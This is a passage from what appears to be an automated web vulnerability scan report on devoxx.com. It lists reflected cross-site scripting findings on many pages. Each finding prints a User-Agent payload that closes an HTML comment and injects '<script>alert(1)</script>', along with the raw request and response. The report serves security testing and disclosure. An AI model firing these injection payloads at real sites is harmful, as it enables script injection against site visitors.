userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2009'
contextPath : ''
action name : 'viewpage'
*
...[SNIP]...

1.28. http://devoxx.com/display/Devoxx2K10/Home [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9d682--><script>alert(1)</script>c9c2c6a7afd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Home HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)9d682--><script>alert(1)</script>c9c2c6a7afd
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:36:32 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842592273
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)9d682--><script>alert(1)</script>c9c2c6a7afd'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.29. http://devoxx.com/display/Devoxx2K10/Javaholics [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Javaholics

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 76fce--><script>alert(1)</script>67136241c2d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Javaholics HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842870583
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 131050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Javaholics'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.30. http://devoxx.com/display/Devoxx2K10/Jboss [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Jboss

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 2f7bb--><script>alert(1)</script>62282269653 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Jboss HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842954866
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Jboss'
contextPath : ''
action name : 'viewpage'
*
...[SNIP]...

1.31. http://devoxx.com/display/Devoxx2K10/News [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/News

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload aa6a7--><script>alert(1)</script>26499719511 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/News HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836428
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/News'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.32. http://devoxx.com/display/Devoxx2K10/Newsletter [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Newsletter

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload f1c8f--><script>alert(1)</script>0d12e21b9d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Newsletter HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:52 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842972291
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 37931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Newsletter'
contextPath : ''
action name : 'viewpage'
**
...[SNIP]...

1.33. http://devoxx.com/display/Devoxx2K10/Oracle [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Oracle

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4db34--><script>alert(1)</script>867d6e034d4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Oracle HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:44 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842964740
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35037

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Oracle'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.34. http://devoxx.com/display/Devoxx2K10/Partners [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Partners

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload cf8ba--><script>alert(1)</script>f98f0df6c51 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Partners HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:25 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842825985
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Partners'
contextPath : ''
action name : 'viewpage'
****
...[SNIP]...

1.35. http://devoxx.com/display/Devoxx2K10/Practical [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Practical

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload ff364--><script>alert(1)</script>7b5293c13a6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Practical HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836934
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35080

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Practical'
contextPath : ''
action name : 'viewpage'
***
...[SNIP]...

1.36. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Privacy+Policy

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload bfcd2--><script>alert(1)</script>4082871896 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Privacy+Policy HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:05 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842985586
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 41986

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Privacy+Policy'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.37. http://devoxx.com/display/Devoxx2K10/Schedule [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9affa--><script>alert(1)</script>0ec3a0f0447 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836081
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.38. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule+REST+interface

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4e81e--><script>alert(1)</script>e07c32ab7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule+REST+interface HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:08 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842928576
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 75557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule+REST+interface'
contextPath : ''
action name : 'vi
...[SNIP]...

1.39. http://devoxx.com/display/Devoxx2K10/Schedules [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedules

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 3b336--><script>alert(1)</script>4650d9ff903 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedules HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:45 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842905939
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 44899

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedules'
contextPath : ''
action name : 'viewpage'
***
...[SNIP]...

1.40. http://devoxx.com/display/Devoxx2K10/Sidebar [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sidebar

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload ae756--><script>alert(1)</script>b9448b28231 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sidebar HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:27 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842827436
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34272

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sidebar'
contextPath : ''
action name : 'viewpage'
*****
...[SNIP]...

1.41. http://devoxx.com/display/Devoxx2K10/Sponsors [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sponsors

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload c81b5--><script>alert(1)</script>5594fe23ee7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sponsors HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:01 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842981133
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 42422

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sponsors'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.42. http://devoxx.com/display/Devoxx2K10/Twitter [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Twitter

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 29266--><script>alert(1)</script>6dfe39b9927 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Twitter HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
